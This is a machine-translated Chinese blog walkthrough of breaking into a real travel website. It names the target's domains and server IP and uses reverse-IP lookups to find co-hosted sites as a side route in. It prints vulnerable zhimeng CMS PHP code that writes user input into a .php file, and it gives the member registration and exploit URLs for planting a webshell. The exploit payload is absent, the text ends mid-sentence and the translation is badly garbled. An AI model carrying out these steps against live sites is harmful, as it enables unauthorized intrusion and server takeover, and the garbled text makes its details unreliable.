Bkjia.com exclusive Article] Hello everyone, I haven't written any articles on detection for a long time. Today, I was asked by my friends to check a website. I will share with you the detection process. I hope you can learn something in this article. Let's start our detection journey!
I. Go straight down with a sword
The website to be tested today is called China outdoor tourism network. The website is published on. Let's take a look at the website structure. The website includes forums, blogs, URL Daquan, air tickets, hotels, vacations, and other modules. The Forum uses the dz6.0 forum. I heard that dz6.0 has 0day, unfortunately, I am a poor man who cannot afford 0-day shopping. I can't start with the Forum after reading it. Let's look at the blog program! Blog cannot be opened, speechless. Let's look at the Web site, and we haven't found any problems. The three modules of air tickets, hotels, and vacations are all linked to Ctrip. Once again, they are speechless. The rest is only the news system of the website. I checked all the static pages generated by the news system, and didn't find any program used by the news system. It seems that there is no way to go straight to the sword line. Let's look at other websites on the server. Let's take a look at it!
Ii. Jian Zou Yifeng
First, let's check the number of websites on this server. The ip address of the server is 222.216.28.235. You can use the ip domain name to query the website http://www.seologs.com/. we have learned that the server has 5 sites.
This site was unavailable for a while because there were too many people in China to query the site, blocking domestic IP addresses. If you cannot query the site in the future, you can use a foreign IP proxy to query the site.
Based on my experience, this server has only five sites. It should be the website builder's own operations and maintenance, this type of server permission settings is much lower than that of the virtual host with hundreds of domain names, and the Elevation of Privilege success rate is also higher than that of the virtual host, when you encounter a query that is a virtual host with hundreds of domain names, you can start from the master station and find a way to start from the master station, it is also difficult to obtain the master site permissions. By-side attention is helpless. You can start with the main station by taking the main station directly. By-side attention is the Final Solution. You must remember it.
Let's take a closer look at 51maihuo.com and uutxx.com. when we open the website, we can see that both domain names are on the same site. This website is a food-related website, and we have roughly looked at it, I have not found any problems, and I have not figured out what programs to use. At this time, I am very depressed. After a while, I thought that there should not be only two websites on this server. I changed my domain name to an ip address to query the website http://www.114best.com/. the query result is displayed. In addition to the two Internet sites, the server also has an Internet site.
Web site is http://www.travelren.net, the website is mainly to introduce travel routes and tourist attractions. The website layout seems to have been a bit familiar. It seems to be the zhimeng Content Management system. Now member is added to the URL and a user logon box is displayed.
It was indeed the zhimeng content system. During this time, zhimeng encountered a loophole. I tested it several times locally. How can I say that the layout is so familiar! Recently, the zhimeng content system has just revealed a write-in vulnerability, provided that the server opens the membership system and there are categories in the library serialization. The vulnerability file appears in the include \ inc_bookfunctions.php file. The Code is as follows:
function WriteBookText($cid,$body) { global $cfg_cmspath,$cfg_basedir; $ipath = $cfg_cmspath."/data/textdata"; $tpath = ceil($cid/5000); if(!is_dir($cfg_basedir.$ipath)) MkdirAll($cfg_basedir.$ipath,$GLOBALS ['cfg_dir_purview']); if(!is_dir($cfg_basedir.$ipath.'/'.$tpath)) MkdirAll($cfg_basedir.$ipath. '/'.$tpath,$GLOBALS['cfg_dir_purview']); $bookfile = $cfg_basedir.$ipath."/{$tpath}/bk{$cid}.php"; $body = "<"."?php\r\n".$body."\r\n?".">"; @$fp = fopen($bookfile,'w'); @flock($fp); @fwrite($fp,$body); @fclose($fp); } member\story_add_content_action.php WriteBookText($arcID,addslashes($body)); |
In the code, we can see that only addslashes is escaped. But $ body = "<"."?
Php \ r \ n ". $ body." \ r \ n? "."> "; Obviously, you can write a pony.
Let's first visit http://www.travelren.net/member/index_do.php? Fmdo = user & dopost = regnew register a new user. Then, use the registered new user to log on. The member system's books are serialized with categories. Submit them immediately,
Http://www.hikers.cn/member/story_add_content_action.php? Chapterid = 1 & arcID = 2 & body =?>
The pony will be generated in the data \ textdata \ directory. The default value is data \ textdata \ 1 \ bk1.php. If someone exploits this vulnerability, the file name will be added every time the file is submitted, after my test, the uploaded pony address is.